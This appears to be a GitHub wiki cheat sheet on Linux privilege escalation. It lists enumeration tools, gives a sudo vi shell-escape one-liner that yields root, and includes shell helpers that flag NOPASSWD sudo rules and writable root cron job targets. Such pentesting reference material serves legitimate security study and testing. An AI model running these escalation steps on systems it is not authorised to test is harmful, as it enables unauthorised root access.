exploitation common linux privilege escalation - dvanmosselbeen/security-cheat-sheet GitHub Wiki

Common Linux Privilege Escalation List

A list of common Linux privilege escalation vectors and how to spot them once you have a shell on a host.

Enumeration

The tools below automate the search for misconfigurations (writable files, weak sudo rules, cron jobs, SUID binaries, credentials lying around) and other paths to privilege escalation on a host you already have a low-privileged shell on.

Tools to enumerate:

  • LinPEAS - Linux Privilege Escalation Awesome Script
  • pspy - unprivileged Linux process snooping (watch what cron and other users run, without root)
  • LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks
  • LSE (linux-smart-enumeration) - Linux enumeration tool for pentesting and CTFs

SUID / SGID files

sudo

Running sudo -l shows what the current user is allowed to run through sudo. In this example user8 may run vi as root, presumably so that user8 can edit system configuration files. The problem is twofold: vi can execute arbitrary commands, and the rule is tagged NOPASSWD, so user8 is not even asked for a password.

user8@polobox:~$ sudo -l
Matching Defaults entries for user8 on polobox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user8 may run the following commands on polobox:
    (root) NOPASSWD: /usr/bin/vi

With this rule user8 can run vi as root and spawn a shell from inside it. Several methods work.

Directly, by having vi run a command as soon as it starts:

user8@polobox:~$ sudo vi -c ':!/bin/sh'
# whoami
root

Or interactively: run sudo vi, then type the following at the vi(m) command line: :!sh

See also the GTFOBins page for vi for more details: https://gtfobins.github.io/gtfobins/vi/
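On a box with many sudo rules it helps to triage the sudo -l output rather than read it by eye. The following POSIX shell helper is an added example, not code from the wiki: it takes saved sudo -l text on stdin, lists every command granted with NOPASSWD, and flags the ones whose binary is in a hand-picked list of programs that GTFOBins documents with a sudo shell escape. Both the sample sudo -l output (the page's user8 rule plus two made-up rules for contrast) and the SHELL_SPAWNERS list are constructed for this example.

```sh
#!/bin/sh
# Added example, not part of the original wiki page.
# Parse saved `sudo -l` output and report which NOPASSWD rules hand out a
# binary that can spawn a shell.

# Constructed sample of `sudo -l` output (the page's user8 rule plus two
# made-up rules for contrast).
SUDO_L_SAMPLE='Matching Defaults entries for user8 on polobox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user8 may run the following commands on polobox:
    (root) NOPASSWD: /usr/bin/vi
    (root) /usr/bin/systemctl restart nginx
    (ALL) NOPASSWD: /usr/bin/find, /usr/bin/less'

# Hand-picked subset of binaries GTFOBins lists with a sudo shell escape.
# This list is an assumption of the example; consult
# https://gtfobins.github.io/ for the full list and the escape for each one.
SHELL_SPAWNERS="vi vim nano find less more man awk perl python python3 env bash sh"

# Read `sudo -l` text on stdin and print each NOPASSWD command on its own
# line. Only rule lines carrying the NOPASSWD: tag survive; the text up to
# and including the tag is dropped and comma-separated lists are split.
# Further tags that may follow (e.g. SETENV:) are left in place on purpose
# so the reader sees them.
nopasswd_commands() {
    sed -n 's/.*NOPASSWD:[[:space:]]*//p' |
        tr ',' '\n' |
        sed 's/^[[:space:]]*//; s/[[:space:]]*$//' |
        grep -v '^$'
}

# Return 0 if the command is ALL or the basename of its first word is a
# known shell spawner, 1 otherwise.
is_shell_spawner() {
    # ALL means any command, which is trivially a root shell.
    if [ "$1" = "ALL" ]; then
        return 0
    fi
    bin=$(basename "${1%% *}")
    for s in $SHELL_SPAWNERS; do
        if [ "$bin" = "$s" ]; then
            return 0
        fi
    done
    return 1
}

# Read `sudo -l` text on stdin; print "RISK <cmd>" for shell spawners and
# "info <cmd>" for everything else.
report_nopasswd() {
    nopasswd_commands | while IFS= read -r cmd; do
        if is_shell_spawner "$cmd"; then
            printf 'RISK %s\n' "$cmd"
        else
            printf 'info %s\n' "$cmd"
        fi
    done
}

# Stand-alone demo against the constructed sample. On a real target run:
#   sudo -l 2>/dev/null | report_nopasswd
printf '%s\n' "$SUDO_L_SAMPLE" | report_nopasswd
```

An "info" line is not automatically safe: a NOPASSWD binary that is missing from the list may still have an escape on GTFOBins, may honour a writable config file, or may resolve a relative path through the (here hardened) secure_path. Treat the list as a first filter, not a verdict.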

Exploiting writable /etc/passwd

Exploiting Crontab

This consists of inspecting the crontabs (/etc/crontab, the files in /etc/cron.d, and any per-user crontab that is readable) for jobs that run as root and execute a script or binary the current user can write to. Modifying that file makes the next run of the job execute our code as root, which is a vertical privilege escalation. pspy (see Enumeration) is useful here as well, because it shows the commands cron actually spawns even when the crontabs themselves are not readable.
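The check described above, as an added example that is not part of the wiki: a POSIX shell helper that parses system-crontab text (the /etc/crontab and /etc/cron.d layout with a user field, plus the @reboot style shorthand), extracts every absolute path in the command part of each job, optionally restricted to one user, and then reports which of those paths the current user can write to. The sample crontab and the scratch directory it points at are constructed so the example runs offline.

```sh
#!/bin/sh
# Added example, not part of the original wiki page.
# Pull the script and binary paths out of a system crontab and report which
# of them the current user can modify.

# Print every absolute path that appears in the command part of a job line.
# Understands the /etc/crontab and /etc/cron.d format
# (min hour dom mon dow user command) and the @reboot/@daily shorthand
# (schedule user command); comments, blank lines and VAR=value lines are
# skipped. An optional argument restricts output to jobs for that user.
cron_job_paths() {
    want=${1:-}
    grep -v -e '^[[:space:]]*#' -e '^[[:space:]]*$' \
            -e '^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' |
    awk -v want="$want" '
        { if ($1 ~ /^@/) { user = $2; first = 3 } else { user = $6; first = 7 } }
        want != "" && user != want { next }
        { for (i = first; i <= NF; i++) printf "%s ", $i; print "" }
    ' |
    grep -Eo '/[^[:space:];&|<>()]+' | sort -u
}

# Print the subset of those paths the current user can write to.
# Caveat: test -w answers for the user running the check, so as root every
# existing path shows up; run this as the low-privileged user.
writable_cron_targets() {
    cron_job_paths "$@" | while IFS= read -r p; do
        if [ -w "$p" ]; then
            printf '%s\n' "$p"
        fi
    done
}

# Constructed sample crontab. Job paths point under the directory given as
# $1 so the example runs offline; "$1/missing.sh" intentionally does not
# exist, which shows that absent targets are not reported as writable.
demo_crontab() {
    cat <<EOF
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    $1/backup.sh
@reboot         root    $1/missing.sh
0 3     * * *   www-data /usr/bin/find /var/tmp -mtime +7 -delete
EOF
}

# Create a scratch directory holding a world-writable backup.sh (the
# misconfiguration this section is about) and print the directory name.
setup_demo() {
    d=$(mktemp -d)
    printf '#!/bin/sh\necho backup\n' > "$d/backup.sh"
    chmod 0777 "$d/backup.sh"
    printf '%s\n' "$d"
}

# Stand-alone demo. On a real target:
#   cat /etc/crontab /etc/cron.d/* 2>/dev/null | writable_cron_targets root
D=$(setup_demo)
echo "paths executed by root cron jobs:"
demo_crontab "$D" | cron_job_paths root
echo "of those, writable by $(id -un):"
demo_crontab "$D" | writable_cron_targets root
rm -rf "$D"
```

Directories count too: /etc/cron.hourly shows up in the path list because run-parts executes everything in it, so a writable cron directory is as good as a writable script. Per-user crontabs under /var/spool/cron have no user field and are not handled by this parser; they are normally unreadable to other users anyway, which is where pspy comes in.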

Resources

Other: